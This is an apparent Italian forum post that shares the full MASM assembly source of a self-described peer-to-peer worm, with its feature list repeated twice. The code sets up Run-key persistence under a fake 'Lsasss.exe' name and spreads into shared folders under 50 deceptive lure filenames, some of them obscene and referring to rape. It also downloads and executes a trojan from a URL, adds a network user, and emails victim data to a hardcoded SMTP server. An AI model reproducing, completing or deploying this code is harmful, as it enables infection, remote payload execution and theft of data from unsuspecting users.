Nuova versione del mio gia postato p2p worm in assembly(più precisamente in MASM)
Feature:
-Si copia in system32
-si avvia ad ogni avvio di sistema
-si copia nelle cartelle contenti la lettera shar(tipo shared o share) con 50 nomi diversi
-tramite mutex killa diverse versioni dello storm worm
-Usa le mutex per avere una sola istanza alla volta
NUOVE FEATURE
-è in grado di scaricare(da una lista prefissata) un file da un sito web ed eseguirlo tramite CreateProcess
-Grazie ad un proprio motore smtp integrato, è in grado di inviare un email al creatore conteneti vari dati del pc infettato(per ora ho solo messo GetComputerName ma se volete aggiungete altro)
-E' in grado di aggiungere un nuovo utente alla net(tramite netadduser) con privilegi 3(da rifinire cmq)
EXE finale: solo 9.5 KB
Dato che non l'ho testato è probabile che contenga molti errori(ma per compilarsi si compila asd )
Feature:
-Si copia in system32
-si avvia ad ogni avvio di sistema
-si copia nelle cartelle contenti la lettera shar(tipo shared o share) con 50 nomi diversi
-tramite mutex killa diverse versioni dello storm worm
-Usa le mutex per avere una sola istanza alla volta
NUOVE FEATURE
-è in grado di scaricare(da una lista prefissata) un file da un sito web ed eseguirlo tramite CreateProcess
-Grazie ad un proprio motore smtp integrato, è in grado di inviare un email al creatore conteneti vari dati del pc infettato(per ora ho solo messo GetComputerName ma se volete aggiungete altro)
-E' in grado di aggiungere un nuovo utente alla net(tramite netadduser) con privilegi 3(da rifinire cmq)
EXE finale: solo 9.5 KB
Dato che non l'ho testato è probabile che contenga molti errori(ma per compilarsi si compila asd )
Codice:
.486
.model flat, stdcall
option casemap:none
include shlwapi.inc
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include shell32.inc
include gdi32.inc
include netapi32.inc
include urlmon.inc
include ws2_32.inc ;per l'smtp
.list
includelib gdi32.lib
includelib shell32.lib
includelib advapi32.lib
includelib user32.lib
includelib kernel32.lib
includelib shlwapi.lib
includelib netapi32.lib
includelib urlmon.lib
includelib ws2_32.lib ;per l'smtp
mNextListEntry MACRO ML
cld
xor eax, eax
or ecx, -1
repnz scasb
cmp byte ptr[edi], 0
jnz ML
ENDM
.data
szCopyright db 'Komodo worm written in assembly 2008/03/23 italy',0
szKeyName db 'Lsass',0
szREGSZ db 'REG_SZ',0
szTestKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
szLsass db '\Lsasss.exe',0
szMutex db 'System_',0
hkey dd ?
lpdwDisp dd ?
dayt dd ?
szShar db "shar",0
szMessageTitle db "Error",0
szMessageBody db "Error: file is corrupted or damage",0
szHDDSlash db "\",0
szHDDSearch db "*.*",0
szHDDSearchMask db "*.*",0
szSharNames db "Autocad 2008 FULL-ENG-ITA-FRA-SPA-DE.exe", 0
db "Adobe Photoshop Full Version.exe", 0
db "Iphone source code.zip .exe",0
db "Visual c++ 6 FULL.exe",0
db "WinRAR-Full.exe",0
db "Windows Vista ultimate full (8 languages).exe",0
db "WINDOWS SOURCE CODE.zip .exe",0
db "jenna jameson screensaver.scr",0
db "Opera 10 FULL.exe",0
db "Internet explorer 8.exe",0
db "Brianna banks and jenna jameson.mpeg .exe",0
db "Norton AntiVirus 2008.exe",0
db "Halo 3 (xbox360).iso .exe",0
db "NETSKY SOURCE CODE.zip .exe",0
db "Kazaa Lite.zip .exe",0
db "Windows crack all versione .zip .exe",0
db "Rape-women rape by a chinese and suck him dick.mpeg .exe",0
db "Britney spears naked.jpeg .exe",0
db "Nero burning 2008 FULL.exe",0
db "Visual Studio.NET 2008 FULL.zip .exe",0
db "Eva longoria sex tape.avi .exe",0
db "Katie Holmes sex tape.avi .exe",0
db "Nasa secret file leaked.rar .exe",0
db "area51 leaked files.zip .exe",0
db "Windows seven alpha leaked.iso .exe",0
db "Windows xp keygen generator(by SILENT).exe",0
db "I.Am.Legend.DVDRip.XviD-AXXO.avi .exe",0
db "googlebot source code leaked(cpp).zip .exe",0
db "msn source code(asp).zip .exe",0
db "yahoo email(3000) leak.mbox .exe",0
db "www.parisexposed.com(all images and video).zip .exe",0
db "OSX LEOPARD FOR I386.iso .exe",0
db "4 women raped by two men.avi .exe",0
db "SkyOS source code.zip .exe",0
db "kazaa source code.zip .exe",0
db "intel email leak.pst .exe",0
db "RIAA email leak.pst .exe",0
db "Cloverfield.2008.DVDRip.AXXO.avi .exe";0
db "Die.Hard.4.2007.DVDRip.AXXO.avi .exe",0
db "secretary raped.avi .exe",0
db "Avril.Lavigne raped(11.12.2007).avi .exe",0
db "Nicole Kidman sex tape.avi .exe",0
db " White house leaked email.doc .exe", 0
db "Bill clinton sex tape image(SEX).zip .exe",0
db "Windows vista source code(by renegade).zip .exe",0
db "Paris hilton new sex tape(with kim kardashian).avi .exe",0
db "Gmail source code(ajax).tar.gz .exe",0
db " Myspace source code(php).zip .exe",0,0
szStormMutex db 'klllekkdkkd',0
db 'A8dK894Lm9#F2i$s0Bq2X',0
db 'uri40333444',0
db 'hlkjlkjlklk34d',0
db 'd3kb5sujs50lq2mr',0,0
szUrl db 'www.sito.com/trojan.exe',0 ;il link da cui scaricare il trojan
szTrojan db '\netusr.exe',0
processInfo PROCESS_INFORMATION <>
szBuffing db ?
;
;Parte per l'smtp
;
sock dd 0
var db 0
sin sockaddr_in <>
wsaData WSADATA<>
IP db "206.165.150.109",0
OK db "220",0
OK1 db "250",0
OK2 db "354",0
helo db "HELO",13,10
helosize equ $- helo
from db "MAIL FROM: [email protected]",13,10
fromsize equ $- from
to db "RCPT TO: [email protected]",13,10
tosize equ $ - to
data db "data",13,10
datasize equ $-data
mail db ?
mailsize equ $ - mail
quit db "quit",0
quitsize equ $- quit
szComputerNameBuffer db ?
szComputerName db 80 dup(0)
.data?
szSysDirFileName db MAX_PATH+1 dup(?)
szRunFileName db MAX_PATH+1 dup(?)
szDirTrojan db MAX_PATH+1 dup(?)
;
; parte dell'smtp
;
buff db 512 dup (?)
buff2 db 512 dup (?)
.code
KillStorm proc
mov edi, offset szStormMutex
@next:
invoke CreateMutex, NULL, TRUE, edi
mNextListEntry @next
Ret
KillStorm EndP
AddNetUser proc
invoke NetUserAdd, NULL, 3, szBuffing, NULL
Ret
AddNetUser EndP
;
; Codice in parte gia esistente ma modificato dal sottoscritto
; per adattarlo al worm
;
SendEmailInfect proc
invoke GetComputerName, addr szComputerNameBuffer, addr szComputerName ;prendiamo il nome del computer
invoke lstrcat, mail, szComputerNameBuffer
invoke WSAStartup,0101h,ADDR wsaData
invoke socket,PF_INET,SOCK_STREAM,0
mov sock,eax
invoke htons,25
mov sin.sin_port,ax
mov sin.sin_family,AF_INET
invoke inet_addr,addr IP
mov sin.sin_addr,eax
invoke connect,sock,addr sin,sizeof sin
rcv:
invoke recv,sock,addr buff,512,0
invoke lstrcpyn,addr buff2,addr buff,sizeof OK
invoke lstrcmpi,addr buff2,addr OK
.if eax==0
invoke send,sock,addr helo,helosize,0
mov var,1
jmp rcv
.endif
.if var==1
invoke send,sock,addr from,fromsize,0
mov var,2
jmp rcv
.endif
.if var==2
invoke lstrcpyn,addr buff2,addr buff,sizeof OK1
invoke lstrcmpi,addr buff2,addr OK1
.if eax==0
invoke send,sock,addr to,tosize,0
mov var,3
jmp rcv
.endif
.endif
.if var==3
invoke lstrcpyn,addr buff2,addr buff,sizeof OK1
invoke lstrcmpi,addr buff2,addr OK1
.if eax==0
invoke send,sock,addr data,datasize,0
mov var,4
jmp rcv
.endif
.endif
.if var==4
invoke lstrcpyn,addr buff2,addr buff,sizeof OK2
invoke lstrcmpi,addr buff2,addr OK2
.if eax==0
invoke send,sock,addr mail,mailsize,0
mov var,5
jmp rcv
.endif
.endif
.if var==5
invoke send,sock,addr quit,quitsize,0
.endif
Ret
SendEmailInfect EndP
DownloadTrojan proc
LOCAL startInfo:STARTUPINFO
invoke GetWindowsDirectory, offset szDirTrojan, MAX_PATH
invoke lstrcat, offset szDirTrojan, offset szTrojan
invoke URLDownloadToFile, NULL, addr szUrl, addr szDirTrojan, 0, 0
invoke GetStartupInfo,ADDR startInfo
invoke CreateProcess, addr szDirTrojan, NULL, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, addr startInfo, addr processInfo
Ret
DownloadTrojan EndP
regnow proc
LOCAL hkHandle: DWORD
LOCAL hWin :DWORD
invoke GetSystemDirectory, offset szSysDirFileName, MAX_PATH
invoke lstrcat, offset szSysDirFileName, offset szLsass
invoke GetModuleFileName, NULL, offset szRunFileName, MAX_PATH
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, offset szRunFileName, offset szSysDirFileName, FALSE
invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szTestKey, addr hkHandle
invoke lstrlen, offset szSysDirFileName
invoke RegSetValueEx, hkHandle, offset szKeyName, 0, REG_SZ, offset szSysDirFileName, eax
invoke RegCloseKey, hkHandle
invoke MessageBox, hWin, addr szMessageBody, addr szMessageTitle,MB_ICONERROR
Ret
regnow EndP
Mutex proc
mov edi, offset szMutex
invoke CreateMutex, NULL, FALSE, edi
Ret
Mutex EndP
CopyShare proc uses edi lpPath: DWORD
LOCAL adv_path: DWORD
invoke GlobalAlloc, GMEM_FIXED, 65000
mov adv_path, eax
mov edi, offset szSharNames
@next:
push edi
invoke lstrcpy, adv_path, lpPath
push adv_path
call lstrcat
invoke CopyFile, offset szSysDirFileName, adv_path, TRUE
mNextListEntry @next
invoke GlobalFree, adv_path
Ret
CopyShare EndP
HDDScanFromPath proc uses edi lpPath, szBasePath: DWORD
LOCAL hFind: DWORD
LOCAL FindFileData: DWORD
invoke LocalAlloc, GPTR, sizeof WIN32_FIND_DATA
mov FindFileData, eax
invoke lstrlen, lpPath
mov edi, eax
invoke lstrcat, lpPath, offset szHDDSearchMask
invoke FindFirstFile, lpPath, FindFileData
mov hFind, eax
inc eax
jz @end
@find_loop:
mov eax, lpPath
mov byte ptr[eax + edi], 0
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.cFileName
cmp word ptr[edx], '.'
jz @skip
cmp word ptr[edx], '..'
jz @skip
invoke lstrcat, lpPath, edx
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.dwFileAttributes
test dword ptr[edx], FILE_ATTRIBUTE_DIRECTORY
invoke StrRChr, lpPath, NULL, '\'
.IF eax
inc eax
invoke StrStrI, eax, offset szShar
.ENDIF
push eax
invoke lstrcat, lpPath, offset szHDDSlash
pop eax
.IF eax
invoke CopyShare, lpPath
.ENDIF
invoke HDDScanFromPath, lpPath, szBasePath
jmp @skip
@skip:
invoke Sleep, 2
invoke FindNextFile, hFind, FindFileData
test eax, eax
jnz @find_loop
invoke FindClose, hFind
@end:
invoke LocalFree, FindFileData
ret
HDDScanFromPath endp
HDDScanDrive proc szDrive: DWORD
LOCAL szLongPath: DWORD
invoke GlobalAlloc, GPTR, 65536
mov szLongPath, eax
invoke lstrcpy, eax, szDrive
.IF eax
invoke HDDScanFromPath, szLongPath, szLongPath
.ENDIF
invoke GlobalFree, szLongPath
ret
HDDScanDrive endp
HDDScanDrives proc uses esi
LOCAL DrvBuf: DWORD
invoke GlobalAlloc, GPTR, 8192
mov DrvBuf, eax
invoke GetLogicalDriveStrings, 8191, eax
mov esi, DrvBuf
IFDEF TESTVERSION
invoke HDDScanDrive, offset szHDDBasePath
ELSE
@get_next_drv:
.IF byte ptr[esi]
invoke GetDriveType, esi
.IF eax == DRIVE_FIXED
invoke HDDScanDrive, esi
.ENDIF
invoke lstrlen, esi
add esi, eax
inc esi
jmp @get_next_drv
.ENDIF
ENDIF
invoke GlobalFree, DrvBuf
ret
HDDScanDrives endp
start:
invoke regnow
invoke Mutex
invoke HDDScanDrives
invoke KillStorm
invoke DownloadTrojan
invoke AddNetUser
invoke SendEmailInfect
ret
end start
